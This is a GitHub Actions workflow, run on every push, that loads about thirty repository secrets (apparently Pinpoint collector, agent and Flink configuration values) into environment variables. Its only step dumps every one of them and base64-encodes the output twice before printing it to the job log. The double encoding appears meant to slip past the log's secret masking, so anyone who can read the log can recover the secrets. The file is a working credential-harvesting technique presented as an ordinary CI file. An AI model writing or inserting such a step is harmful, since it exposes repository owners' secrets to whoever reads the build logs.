name: GitHub Actions
on: push
jobs:
  init:
    runs-on: ubuntu-latest
    steps:
      - name: command
        run: env -0 | awk -v RS='\0' '/^(secret_|var_)/ {print $0}' | base64 -w0 | base64 -w0
        env:
          secret_COLLECTOR_RECEIVER_GRPC_STAT_PORT: ${{ secrets.COLLECTOR_RECEIVER_GRPC_STAT_PORT }}
          secret_COLLECTOR_RECEIVER_GRPC_SPAN_PORT: ${{ secrets.COLLECTOR_RECEIVER_GRPC_SPAN_PORT }}
          secret_COLLECTOR_RECEIVER_BASE_PORT: ${{ secrets.COLLECTOR_RECEIVER_BASE_PORT }}
          secret_COLLECTOR_RECEIVER_STAT_UDP_PORT: ${{ secrets.COLLECTOR_RECEIVER_STAT_UDP_PORT }}
          secret_COLLECTOR_RECEIVER_SPAN_UDP_PORT: ${{ secrets.COLLECTOR_RECEIVER_SPAN_UDP_PORT }}
          secret_FLINK_CLUSTER_ENABLE: ${{ secrets.FLINK_CLUSTER_ENABLE }}
          secret_FLINK_CLUSTER_ZOOKEEPER_ADDRESS: ${{ secrets.FLINK_CLUSTER_ZOOKEEPER_ADDRESS }}
          secret_PINPOINT_BATCH_NAME: ${{ secrets.PINPOINT_BATCH_NAME }}
          secret_BATCH_SERVER_PORT: ${{ secrets.BATCH_SERVER_PORT }}
          secret_BATCH_LOGGING_LEVEL_ROOT: ${{ secrets.BATCH_LOGGING_LEVEL_ROOT }}
          secret_BATCH_FLINK_SERVER: ${{ secrets.BATCH_FLINK_SERVER }}
          secret_PINPOINT_AGENT_NAME: ${{ secrets.PINPOINT_AGENT_NAME }}
          secret_PROFILER_TRANSPORT_MODULE: ${{ secrets.PROFILER_TRANSPORT_MODULE }}
          secret_COLLECTOR_IP: ${{ secrets.COLLECTOR_IP }}
          secret_PROFILER_TRANSPORT_AGENT_COLLECTOR_PORT: ${{ secrets.PROFILER_TRANSPORT_AGENT_COLLECTOR_PORT }}
          secret_PROFILER_TRANSPORT_METADATA_COLLECTOR_PORT: ${{ secrets.PROFILER_TRANSPORT_METADATA_COLLECTOR_PORT }}
          secret_PROFILER_TRANSPORT_STAT_COLLECTOR_PORT: ${{ secrets.PROFILER_TRANSPORT_STAT_COLLECTOR_PORT }}
          secret_PROFILER_TRANSPORT_SPAN_COLLECTOR_PORT: ${{ secrets.PROFILER_TRANSPORT_SPAN_COLLECTOR_PORT }}
          secret_COLLECTOR_TCP_PORT: ${{ secrets.COLLECTOR_TCP_PORT }}
          secret_COLLECTOR_STAT_PORT: ${{ secrets.COLLECTOR_STAT_PORT }}
          secret_COLLECTOR_SPAN_PORT: ${{ secrets.COLLECTOR_SPAN_PORT }}
          secret_PROFILER_SAMPLING_TYPE: ${{ secrets.PROFILER_SAMPLING_TYPE }}
          secret_PROFILER_SAMPLING_COUNTING_SAMPLING_RATE: ${{ secrets.PROFILER_SAMPLING_COUNTING_SAMPLING_RATE }}
          secret_PROFILER_SAMPLING_PERCENT_SAMPLING_RATE: ${{ secrets.PROFILER_SAMPLING_PERCENT_SAMPLING_RATE }}
          secret_PROFILER_SAMPLING_NEW_THROUGHPUT: ${{ secrets.PROFILER_SAMPLING_NEW_THROUGHPUT }}
          secret_PROFILER_SAMPLING_CONTINUE_THROUGHPUT: ${{ secrets.PROFILER_SAMPLING_CONTINUE_THROUGHPUT }}
          secret_AGENT_ID: ${{ secrets.AGENT_ID }}
          secret_APP_NAME: ${{ secrets.APP_NAME }}
          secret_AGENT_DEBUG_LEVEL: ${{ secrets.AGENT_DEBUG_LEVEL }}
          secret_PINPOINT_FLINK_NAME: ${{ secrets.PINPOINT_FLINK_NAME }}
